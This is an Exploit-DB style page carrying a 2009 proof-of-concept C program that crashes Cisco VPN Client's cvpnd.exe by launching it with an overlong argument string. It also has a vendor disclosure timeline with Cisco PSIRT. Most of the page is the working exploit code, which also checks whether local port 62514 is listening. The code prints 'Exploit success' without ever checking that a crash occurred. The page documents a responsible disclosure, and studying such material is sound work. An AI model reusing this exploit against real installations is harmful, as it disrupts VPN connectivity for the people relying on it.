header-logo
Suggest Exploit
vendor:
Cisco VPN Client
by:
Alex Hernandez aka alt3kx
7.5
CVSS
HIGH
Denial of Service
190
CWE
Product Name: Cisco VPN Client
Affected Version From: Cisco VPN client version 5.0.03.0560
Affected Version To: Cisco VPN client Version 4.8.02.0010
Patch Exists: NO
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested: Windows Vista Bussines SP1 Spanish, Windows Vista Home Premium SP1 English, Windows 2000 Server English, Windows XP Professional SP3
2009

Cisco VPN Client Integer Overflow Denial of Service Vulnerability

This proof of concept code demonstrates an integer overflow vulnerability in the Cisco VPN Client. If a maliciously crafted file containing malformed characters is read by the application, it will crash. This vulnerability has been tested on various Windows operating systems and different versions of the Cisco VPN Client.

Mitigation:

No mitigation provided
Source

Exploit-DB raw data:

/*
Cisco VPN client version 5.0.03.0560
Cisco VPN client Version 5.0.04.0300
Cisco VPN client Version 5.0.05.0290
Cisco VPN client Version 4.8.02.0010 
*/

/* 
 * Cisco VPN Client 0day Integer overflow (DOS) Proof Of Concept Code
 *
 * By Alex Hernandez aka alt3kx (c) November 2009
 *
 * This POC is only for test. If an application read a malformed chars 
 * file like this POC, the application will be crashed.
 *
 * We tested this code on:
 *
 * Windows Vista Bussines SP1 Spanish
 * Windows Vista Home Premium  SP1 English
 * Windows 2000 Server English
 * Windows XP Professional SP3
 *
 * Cisco VPN client version 5.0.03.0560
 * Cisco VPN client Version 5.0.04.0300
 * Cisco VPN client Version 5.0.05.0290
 * Cisco VPN client Version 4.8.02.0010
 * 
 * Compiled on VC++ win32
 *  
 * Friends:
 * sirdarckcat, nitr0us, hkm, crypkey, xDAWN, canit0, chr1x
 *
 * TT & DSRT
 * daSh, p4r4n01ds, darkslaker, beto, motis. 
 *
 * Very special credits to:
 *
 * str0ke (milw0rm.com)
 * rathaus (securiteam.com)
 * FX (Phenoelit.de)
 * dSR! (segfault.es)
 * 0dd (0dd.com)
 * 
 * 
 * PH-Neutral 0x7d9, We hope to see u there intruders
 * 
 * ---------------
 * Report Timeline 
 * ---------------
 * 06/03/2009	The vulnerability was discovered.
 * 07/03/2009	Exploit/PoC code was developed (private).
 * 09/03/2009	Cisco PSIRT was notified about the issue.
 * 11/03/2009	Vendor response asking for details of the testing environment.
 * 12/03/2009	Test scenario explained and sent a PDF document with details.
 * 16/03/2009	Developers/PSIRT confirmed the vulnerability.
 * 19/03/2009	New test scenarios around new versions (CISCO VPN client).
 * 23/03/2009	CISCO PSIRT assing an internal tracking PSIRT-0676131279.
 * 23/03/2009	CISCO PSIRT assing an Bug ID-CSCsz49276.
 * 15/04/2009	New Advisory release (private).
 * 16/04/2009	New PSIRT feedback no ETA avaiable.
 * 23/04/2009	The development team working the fix.
 * 01/05/2009	The development team estimated one month to fix.
 * 01/06/2009	New PSIRT feedback, no ETA available.
 * 29/06/2009	The development team estimated one month to fix.
 * 28/07/2009	The development team working on maitenance release.
 * 28/07/2009	The development team estimated one month to fix.
 * 02/09/2009	New vulnerabilities found on CISCO VPN client.
 * 02/09/2009	The development team can not publish the new version 5.0.6.
 * 02/09/2009	The development team working on maitenance release.
 * 02/09/2009	The development team estimated one month to fix.
 * 10/09/2009	The BETA program should be finished by the end of Oct 
 * and the client posted next month.
 * 07/10/2009	The development team estimated one month to fix.
 * 11/11/2009	New PSIRT feedback RNA avaiable.
 * 19/11/2009	The vulnerability goes public and PSIRT is informed.
 * 19/11/2009	Fix and details will available on CISCO Intellishield Alert & Bug Tool kit.
 * 
 * CISCO Fix and Details:
 * 
 * BugToolKit:
 * http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsz49276
 *
 * Intellishield Alert:
 * http://tools.cisco.com/security/center/viewAlert.x?alertId=19445
 * 
 */
 
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#pragma comment ( lib, "ws2_32.lib" )
 
int CheckPortUDP( short int nPort )
{
    struct sockaddr_in nSockServer;
 
    WSADATA wsaData;
 
    int lBusy = 0;
    int nSocket;
 
    /* Initialization */
    if( WSAStartup( 0x0101, &wsaData ) == 0 )
    {
        /* Create Socket */
        nSockServer.sin_family      = AF_INET;
        nSockServer.sin_port        = htons( nPort );
        nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
 
        /* Check UDP Protocol */
        nSocket = socket( AF_INET, SOCK_DGRAM, 0 );
 
        lBusy = ( bind( nSocket, (SOCKADDR FAR *) &nSockServer,
                            sizeof( SOCKADDR_IN ) ) == SOCKET_ERROR );
 
        /* Close Socket if Busy */
        if( lBusy )
            closesocket( nSocket );
 
        /* Close Winsock */
        WSACleanup();
    }
 
    /* Return */
    return( lBusy );
}

int CheckPortTCP( short int nPort )
{
    struct sockaddr_in nSockServer;
 
    WSADATA wsaData;
 
    int lBusy = 0;
    int nSocket;
 
    /* Initialization */
    if( WSAStartup( 0x0101, &wsaData ) == 0 )
    {
        /* Create Socket */
        nSockServer.sin_family      = AF_INET;
        nSockServer.sin_port        = htons( nPort );
        nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
 
        /* Check TCP Protocol */
        nSocket = socket( AF_INET, SOCK_STREAM, 0 );
 
        lBusy = ( connect( nSocket, (struct sockaddr *) &nSockServer,
                     sizeof( nSockServer ) ) == 0 );
 
        /* Close Socket if Busy */
        if( lBusy )
            closesocket( nSocket );
 
        /* Close Winsock */
        WSACleanup();
    }
 
    /* Return */
    return( lBusy );
}

int main(void)
{

	char szPath[] = "C:\\Program Files\\Cisco Systems\\VPN Client\\cvpnd.exe";
	//uncomment this line for Windows XP Spanish versions
	//char szPath[] = "C:\\Archivos de programa\\Cisco Systems\\VPN Client\\cvpnd.exe";
	char buffer[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
	PROCESS_INFORMATION pif;
	STARTUPINFO si;
	ZeroMemory(&si,sizeof(si));
	si.cb = sizeof(si);

	BOOL bRet = CreateProcess(
        szPath,
        buffer,
        NULL,
        NULL,
        FALSE,
        0,
        NULL,
        NULL,
        &si,
        &pif);
	
	system("cls");
	printf("\n .:: Cisco VPN Client 0day Integer overflow (DoS) Proof Of Concept Code ::.\n");
	printf(" .:: By Alex Hernandez aka alt3kx (c) November 2009 .::\n\n");  

	
	/* Check for TCP Port */
 
    if( CheckPortTCP(62514) )
        printf("[+] Cisco VPN Client TCP port listening\t[OK!]\n");
    else
        printf("[+] Cisco VPN Client TCP Port isn't Busy\t[Wrong!]\n");

    /* Check for UDP Port */
 
    if( CheckPortUDP(62514) )
        printf("[+] Cisco VPN Client UDP port listening\t[OK!]\n");
    else
        printf("[+] Cisco VPN Client UDP Port isn't Busy\t[Wrong!]\n");

	if(bRet == FALSE){MessageBox(HWND_DESKTOP,"Unable to start program check the default PATH Cisco VPN Client cvpnd.exe\n","",MB_OK);
    return 1;}

	else if (bRet == TRUE){MessageBox(HWND_DESKTOP,"Attempting exploit Cisco VPN DoS exploit...","",MB_OK);
		printf("\n[+] Few seconds to crash the program...\n");
		printf("[+] Exploit success...\n\n");
	return 1;} 

    CloseHandle(pif.hProcess);
    CloseHandle(pif.hThread);

}